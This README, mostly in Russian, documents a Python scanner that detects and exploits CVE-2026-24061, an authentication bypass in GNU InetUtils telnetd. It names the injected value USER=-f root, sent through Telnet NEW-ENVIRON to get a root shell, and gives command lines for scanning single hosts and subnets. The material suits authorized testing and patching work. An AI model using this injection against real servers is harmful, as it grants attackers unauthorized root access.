
CVE-2026-24061 — Сканер обхода аутентификации GNU InetUtils Telnetd
Сканер безопасности на Python, который обнаруживает и эксплуатирует CVE-2026-24061, критическую (CVSS 9.8) уязвимость обхода аутентификации в GNU InetUtils telnetd версий с 1.9.3 по 2.7.
Сканер внедряет вредоносное значение USER=-f root через опцию Telnet NEW-ENVIRON (RFC 1572), обманывая сервер, заставляя его пропустить аутентификацию и предоставить оболочку root.
id# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| Программное обеспечение | Уязвимые | Исправленные |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
Этот инструмент предназначен только для авторизованных исследований безопасности и образовательных целей. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Ahmad Sadeeq